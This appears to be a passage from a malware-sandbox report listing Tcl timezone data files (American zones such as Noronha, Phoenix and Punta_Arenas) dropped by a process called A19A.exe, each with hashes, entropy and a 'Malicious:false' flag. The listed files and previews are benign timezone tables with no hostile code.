                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Noronha) {. {-9223372036854775808 -7780 0 LMT}. {-1767217820 -7200 0 -02}. {-1206961200 -3600 1 -02}. {-1191366000 -7200 0 -02}. {-1175378400 -3600 1 -02}. {-1159830000 -7200 0 -02}. {-633823200 -3600 1 -02}. {-622072800 -7200 0 -02}. {-602287200 -3600 1 -02}. {-591836400 -7200 0 -02}. {-570751200 -3600 1 -02}. {-560214000 -7200 0 -02}. {-539128800 -3600 1 -02}. {-531356400 -7200 0 -02}. {-191368800 -3600 1 -02}. {-184201200 -7200 0 -02}. {-155167200 -3600 1 -02}. {-150073200 -7200 0 -02}. {-128901600 -3600 1 -02}. {-121129200 -7200 0 -02}. {-99957600 -3600 1 -02}. {-89593200 -7200 0 -02}. {-68421600 -3600 1 -02}. {-57970800 -7200 0 -02}. {499744800 -3600 1 -02}. {511232400 -7200 0 -02}. {530589600 -3600 1 -02}. {540262800 -7200 0 -02}. {562125600 -3600 1 -02}. {571194000 -7200 0 -02}. {592970400 -3600 1 -02}. {602038800 -7200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8278
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7975723806562063
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:raF2dVtXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Dac5TE35:OFcVtXwDTIRqfh57Tlto//q7u379zlqw
                                                                                                                                                                                                                                                                                                                                MD5:15AABAE9ABE4AF7ABEADF24A510E9583
                                                                                                                                                                                                                                                                                                                                SHA1:3DEF11310D02F0492DF09591A039F46A8A72D086
                                                                                                                                                                                                                                                                                                                                SHA-256:B328CC893D217C4FB6C84AA998009940BFBAE240F944F40E7EB900DEF1C7A5CF
                                                                                                                                                                                                                                                                                                                                SHA-512:7A12A25EB6D6202C47CFDD9F3CE71342406F0EDA3D1D68B842BCFE97EFF1F2E0C11AD34D4EE0A61DF7E0C7E8F400C8CCA73230BDB3C677F8D15CE5CBA44775D7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Beulah) {. {-9223372036854775808 -24427 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8278
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7834920003907664
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:LF2dK7X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaT:LFcK7X0N41+IestuNEbYkzbXwDTIRqfK
                                                                                                                                                                                                                                                                                                                                MD5:AC804124F4CE4626F5C1FDA2BC043011
                                                                                                                                                                                                                                                                                                                                SHA1:4B3E8CC90671BA543112CEE1AB5450C6EA4615DF
                                                                                                                                                                                                                                                                                                                                SHA-256:E90121F7D275FDCC7B8DCDEC5F8311194D432510FEF5F5F0D6F211A4AACB78EF
                                                                                                                                                                                                                                                                                                                                SHA-512:056EF65693C16CB58EC5A223528C636346DB37B75000397D03663925545979792BBC50B20B5AA20139ECE9A9D6B73DA80C2319AA4F0609D6FC1A6D30D0567C58
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Center) {. {-9223372036854775808 -24312 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8281
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.795939700557522
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:uF2dyuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Da:uFcyuNEbYkzbXwDTIRqfh57Tlto//q7k
                                                                                                                                                                                                                                                                                                                                MD5:E26FC508DFD73B610C5543487C763FF5
                                                                                                                                                                                                                                                                                                                                SHA1:8FBDE67AF561037AAA2EDF93E9456C7E534F4B5A
                                                                                                                                                                                                                                                                                                                                SHA-256:387D3C57EDE8CCAAD0655F19B35BC0D124C016D16F06B6F2498C1151E4792778
                                                                                                                                                                                                                                                                                                                                SHA-512:8A10B7370D1521EDF18AB4D5192C930ABC68AB9AE718ADF3D175EACE9A1F5DAC690A76B02EFB4059374761962D8C2660497F8E951DFE9812FB3CFCFDF9165E45
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/New_Salem) {. {-9223372036854775808 -24339 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6621
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7945318113967823
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5gUFM/6M/Mp5tyTc8Ln4ypZ9giGuWGwZIoktiz+hL5Cw5feQ5BT5rBSNNOVQoh/5:KJNfzo+C2mWBNQMsmNTxf6AeO+cblX
                                                                                                                                                                                                                                                                                                                                MD5:D88A28F381C79410D816F8D2D1610A02
                                                                                                                                                                                                                                                                                                                                SHA1:81949A1CACD5907CA5A8649385C03813EEFCDDE0
                                                                                                                                                                                                                                                                                                                                SHA-256:F65C0F8532387AFE703FACDEE325BF8D7F3D1232DEE92D65426FF917DD582CB3
                                                                                                                                                                                                                                                                                                                                SHA-512:9A9B0C65ECDFF690EF2933B323B3A1CF2D67D0A43F285BB9FEEFF275316148A07F5AC044C48F64E3D8CFA7C1DE44AF220A6855DC01225F8BFFF63AEC946B944A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Ojinaga) {. {-9223372036854775808 -25060 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -2520
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.924365872261203
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52IAcGEu5fcXGm2OHGf8xYvX5BidhZSsc1HRX1vain:SlSWB9X5290WTm2OHDxYP5GhZE3X1iin
                                                                                                                                                                                                                                                                                                                                MD5:771816CABF25492752C5DA76C5EF74A5
                                                                                                                                                                                                                                                                                                                                SHA1:6494F467187F99C9A51AB670CD8DC35078D63904
                                                                                                                                                                                                                                                                                                                                SHA-256:0E323D15EA84D4B6E838D5DCD99AEE68666AF97A770DA2AF84B7BDCA4AB1DBBA
                                                                                                                                                                                                                                                                                                                                SHA-512:C32D918E121D800B9DFD5CE1F13A4BF2505C0EDCE0085639C8EDF48073E0888906F1A28EF375BDCF549DB14CD33F7C405E28BC35DDF22445C224FBC64146B4EC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Panama) {. {-9223372036854775808 -19088 0 LMT}. {-2524502512 -19176 0 CMT}. {-1946918424 -18000 0 EST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7484
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.768929501362495
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:i2KFEUlpde9pXbO53or0gqvOTFhPI1jFIL:n0r3+
                                                                                                                                                                                                                                                                                                                                MD5:2701DA468F9F1C819301374E807AAA27
                                                                                                                                                                                                                                                                                                                                SHA1:F08D7525639EA752D52F36A6D14F14C5514CED8E
                                                                                                                                                                                                                                                                                                                                SHA-256:6C7DFDE581AC9DE7B4ED6A525A40F905B7550BD2AE7E55D7E2E1B81B771D030B
                                                                                                                                                                                                                                                                                                                                SHA-512:98BD9EDD40D2982E20A169B8B8E8D411382E5707634BB4F8365CFFF73DB17B8C042D7ED1A59B9511A3A7EB587895119532CCED69F5EFBC49D74FFDC9CA91966F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Pangnirtung) {. {-9223372036854775808 0 0 -00}. {-1546300800 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-147902400 -7200 1 ADDT}. {-131572800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050400 -10800 1 ADT}. {594190800 -14400 0 AST}. {607500000 -10800 1 ADT}. {625640400 -14400 0 AST}. {638949600 -10800 1 ADT}. {657090000 -14400 0 AST}. {671004000 -10800 1 ADT}. {688539600 -14400 0 AST}. {702
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):244
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.731092370398455
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290oldJm2OHeke3FIMVTvVOzGXg/VVFAHC:MBp5290olLmdHeV3qSv4zX/OHC
                                                                                                                                                                                                                                                                                                                                MD5:5D11C2A86B0CDE60801190BFC8FA5E0B
                                                                                                                                                                                                                                                                                                                                SHA1:38A63200995E359E61F1DEA00C5716938ED7A499
                                                                                                                                                                                                                                                                                                                                SHA-256:D2078D8D396D5189E1D3555628960990FD63694D08256FF814EE841E01A3F56E
                                                                                                                                                                                                                                                                                                                                SHA-512:D4D83019E5AE05C3FCDE3518672DC08925C0DECC9FCA6927D75ADA969647CE8EF2D1C67FFD1A075969309CD1B1AADDF15DB21ABDAF241EAA450D2C9E038AEF6A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Paramaribo) {. {-9223372036854775808 -13240 0 LMT}. {-1861906760 -13252 0 PMT}. {-1104524348 -13236 0 PMT}. {-765317964 -12600 0 -0330}. {465449400 -10800 0 -03}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):479
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.379302206927978
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5290OQmdH514YPFotFg4tFQxRgmjtFdRb2:cQCeksFsFgcFQxBhF7b2
                                                                                                                                                                                                                                                                                                                                MD5:1B5C5CBC4168FCCC9100487D3145AF6D
                                                                                                                                                                                                                                                                                                                                SHA1:6E9E3074B783108032469C8E601D2C63A573B840
                                                                                                                                                                                                                                                                                                                                SHA-256:9E28F87C0D9EE6AD6791A220742C10C135448965E1F66A7EB04D6477D8FA11B0
                                                                                                                                                                                                                                                                                                                                SHA-512:4A6527FF5C7F0A0FDC574629714399D9A475EDC1338BF4C9EEEEDCC8CA23E14D2DE4DCA421D46FABA813A65236CD7B8ADBE103B641A763C6BC508738BF73A58C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Phoenix) {. {-9223372036854775808 -26898 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-820519140 -25200 0 MST}. {-796841940 -25200 0 MST}. {-94669200 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-56221200 -25200 0 MST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):6398
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.770736282266079
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5IV1C8phBVSWroLMEbF8xzqXtWl5Hm0RU+5oaIOWIF4IPWFeB/5udPOcBqYZ4vxl:mKXrvOTFhP5S+ijFnRaJeaX1eyDt
                                                                                                                                                                                                                                                                                                                                MD5:7802A7D0CAEECF52062EA9AAC665051A
                                                                                                                                                                                                                                                                                                                                SHA1:D965CD157A99FD258331A45F5E86B8F17A444D2B
                                                                                                                                                                                                                                                                                                                                SHA-256:3D1BEDC932E5CB6315438C7EF060824C927C547009EEA25E8CF16C9D8C4A28B6
                                                                                                                                                                                                                                                                                                                                SHA-512:4D369FF44CC1B1CBA75C0249B032581BA792830479D22C418C5B0599975E715B8983D93F52B00793F2A419F530BC8877D2DA251393592FD6B865499A97875FD8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port-au-Prince) {. {-9223372036854775808 -17360 0 LMT}. {-2524504240 -17340 0 PPMT}. {-1670483460 -18000 0 EST}. {421218000 -14400 1 EDT}. {436334400 -18000 0 EST}. {452062800 -14400 1 EDT}. {467784000 -18000 0 EST}. {483512400 -14400 1 EDT}. {499233600 -18000 0 EST}. {514962000 -14400 1 EDT}. {530683200 -18000 0 EST}. {546411600 -14400 1 EDT}. {562132800 -18000 0 EST}. {576050400 -14400 1 EDT}. {594194400 -18000 0 EST}. {607500000 -14400 1 EDT}. {625644000 -18000 0 EST}. {638949600 -14400 1 EDT}. {657093600 -18000 0 EST}. {671004000 -14400 1 EDT}. {688543200 -18000 0 EST}. {702453600 -14400 1 EDT}. {719992800 -18000 0 EST}. {733903200 -14400 1 EDT}. {752047200 -18000 0 EST}. {765352800 -14400 1 EDT}. {783496800 -18000 0 EST}. {796802400 -14400 1 EDT}. {814946400 -18000 0 EST}. {828856800 -14400 1 EDT}. {846396000 -18000 0 EST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):155
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.077805073731929
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52IAcGEuPXGkXGm2OHUnvUdxKzVvwvYv:SlSWB9X5290eSm2OHkzVr
                                                                                                                                                                                                                                                                                                                                MD5:8169D55899164E2168EF50E219115727
                                                                                                                                                                                                                                                                                                                                SHA1:42848A510C120D4E834BE61FC76A1C539BA88C8A
                                                                                                                                                                                                                                                                                                                                SHA-256:6C8718C65F99AB43377609705E773C93F7993FBB3B425E1989E8231308C475AF
                                                                                                                                                                                                                                                                                                                                SHA-512:1590D42E88DD92542CADC022391C286842C156DA4795877EA67FEF045E0A831615C3935E08098DD71CF29C972EDC79084FFCC9AFAB7813AE74EEE14D6CFEFB9D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port_of_Spain) {. {-9223372036854775808 -14764 0 LMT}. {-1825098836 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):196
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.818272118524638
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3y7thtedVAIgpthKQ290msh490thB:MBaIMYdxpR290v490x
                                                                                                                                                                                                                                                                                                                                MD5:1C0C736D0593654230FCBB0DC275313B
                                                                                                                                                                                                                                                                                                                                SHA1:00518615F97BCFF2F6862116F4DF834B70E2D4CA
                                                                                                                                                                                                                                                                                                                                SHA-256:5C97E6DF0FC03F13A0814274A9C3A983C474000AE3E78806B38DF9208372FD54
                                                                                                                                                                                                                                                                                                                                SHA-512:2252D17CB4F770124586BBF35974077212B92C1587071C9F552F1EFAC15CBF92128E61C456F9F5154D212F7D66CC5BD85B76B1187D5A6F24E89E14EDF322D67F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1016
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7660008200834842
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQQe478Sos/USws/QSI/LHSD/vOSy/WS3o/aS2/vSh/TSSX/WcSp/ySZd/YlSj/f:5bSaSwXS4SqSbS3JSySxSxcSESAlSQSv
                                                                                                                                                                                                                                                                                                                                MD5:5E4CB713378D22D90A1A86F0AF33D6E8
                                                                                                                                                                                                                                                                                                                                SHA1:CF4B2A68873BF778257D40AEA887D4BCBEE6CC72
                                                                                                                                                                                                                                                                                                                                SHA-256:6D7F49E0A67C69A3945DA4BC780653C8D875650536A810610A6518080CC483DB
                                                                                                                                                                                                                                                                                                                                SHA-512:06559B6E80BCDD42120398E19CCB3AEE8A1B08E09D0DF07DB9CCD68A863A7670D6D6457018CE3D9E23FE359D3E2EC0D249134EE0D969C0312665975B67DB8E80
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Porto_Velho) {. {-9223372036854775808 -15336 0 LMT}. {-1767210264 -14400 0 -04}. {-1206954000 -10800 1 -04}. {-1191358800 -14400 0 -04}. {-1175371200 -10800 1 -04}. {-1159822800 -14400 0 -04}. {-633816000 -10800 1 -04}. {-622065600 -14400 0 -04}. {-602280000 -10800 1 -04}. {-591829200 -14400 0 -04}. {-570744000 -10800 1 -04}. {-560206800 -14400 0 -04}. {-539121600 -10800 1 -04}. {-531349200 -14400 0 -04}. {-191361600 -10800 1 -04}. {-184194000 -14400 0 -04}. {-155160000 -10800 1 -04}. {-150066000 -14400 0 -04}. {-128894400 -10800 1 -04}. {-121122000 -14400 0 -04}. {-99950400 -10800 1 -04}. {-89586000 -14400 0 -04}. {-68414400 -10800 1 -04}. {-57963600 -14400 0 -04}. {499752000 -10800 1 -04}. {511239600 -14400 0 -04}. {530596800 -10800 1 -04}. {540270000 -14400 0 -04}. {562132800 -10800 1 -04}. {571201200 -14400 0 -04}. {590036400
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):273
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.728240676465187
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X5290pbm2OH9VPMGoeVVFrZVVFUFkeF3k/eJpR/r:MBp5290lmdHvPMpe/ZZ/uFkeF3k/eJ/D
                                                                                                                                                                                                                                                                                                                                MD5:2FB893819124F19A7068F802D6A59357
                                                                                                                                                                                                                                                                                                                                SHA1:6B35C198F74FF5880714A3182407858193CE37A4
                                                                                                                                                                                                                                                                                                                                SHA-256:F05530CFBCE7242847BE265C2D26C8B95B00D927817B050A523FFB139991B09E
                                                                                                                                                                                                                                                                                                                                SHA-512:80739F431F6B3548EFD4F70FE3630F66F70CB29B66845B8072D26393ADD7DAB22675BE6DA5FBDC7561D4F3F214816AAD778B6CD0EE45264B4D6FFA48B3AC7C43
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Puerto_Rico) {. {-9223372036854775808 -15865 0 LMT}. {-2233035335 -14400 0 AST}. {-873057600 -10800 0 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3576
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5316229197228632
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:Yv9+P8pYraRo+kP0pDrMb6UHlRnHqhTxxJAHXEa9c0yq/g2tw5E8fIk5iWpOFZAd:YoP8pYraRo+kP0pDrMb60RnHqhTxxJAw
                                                                                                                                                                                                                                                                                                                                MD5:1FFFED9AA83AA3CA9E7330AA27E8D188
                                                                                                                                                                                                                                                                                                                                SHA1:9B45F2662C1F3F0799ED4221E843483674878F43
                                                                                                                                                                                                                                                                                                                                SHA-256:FECDC08709D5852A07D8F5C7DD7DBDBCD3D864A0893248E3D3932A2F848EB4B2
                                                                                                                                                                                                                                                                                                                                SHA-512:8F6D51F94A91168EE092972316E150C2B487808EA3506F77FD028F84436FE29AD5BAD50A8DB65BCFB524D5A12DC1C66C5C0BC9A7FC6AE8A0EAAED6F4BA5ADED7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Punta_Arenas) {. {-9223372036854775808 -17020 0 LMT}. {-2524504580 -16966 0 SMT}. {-1892661434 -18000 0 -05}. {-1688410800 -16966 0 SMT}. {-1619205434 -14400 0 -04}. {-1593806400 -16966 0 SMT}. {-1335986234 -18000 0 -05}. {-1335985200 -14400 1 -05}. {-1317585600 -18000 0 -05}. {-1304362800 -14400 1 -05}. {-1286049600 -18000 0 -05}. {-1272826800 -14400 1 -05}. {-1254513600 -18000 0 -05}. {-1241290800 -14400 1 -05}. {-1222977600 -18000 0 -05}. {-1209754800 -14400 1 -05}. {-1191355200 -18000 0 -05}. {-1178132400 -14400 0 -04}. {-870552000 -18000 0 -05}. {-865278000 -14400 0 -04}. {-718056000 -18000 0 -05}. {-713649600 -14400 0 -04}. {-36619200 -10800 1 -04}. {-23922000 -14400 0 -04}. {-3355200 -10800 1 -04}. {7527600 -14400 0 -04}. {24465600 -10800 1 -04}. {37767600 -14400 0 -04}. {55915200 -10800 1 -04}. {69217200 -14400 0 -04}. {87
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7840
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.75014960690837
                                                                                                                                                                                                                                                                                                                                Encrypted:false
